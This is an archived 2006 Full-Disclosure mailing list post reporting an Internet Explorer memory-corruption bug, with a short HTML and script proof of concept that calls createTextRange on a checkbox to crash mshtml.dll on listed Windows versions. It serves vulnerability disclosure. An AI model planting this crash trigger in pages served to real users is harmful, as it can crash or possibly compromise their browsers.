[Full-disclosure] IE crash

Type securityvulns
Reporter Securityvulns
Modified 2006-03-22T00:00:00


I can't find any info on this delicious IE bug, but it seems to be publicly known:

<input type="checkbox" id='c'> <script> r=document.getElementById("c"); a=r.createTextRange(); </script>

It will badly access a (virtual?) pointer table, making EIP to jump at a random address. This has various effects on the system I've tested with, including crashing. It works on these versions of mshtml.dll: XP SP2: 6.0.2900.2802 - latest WS2003: 6.0.3790.0

Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/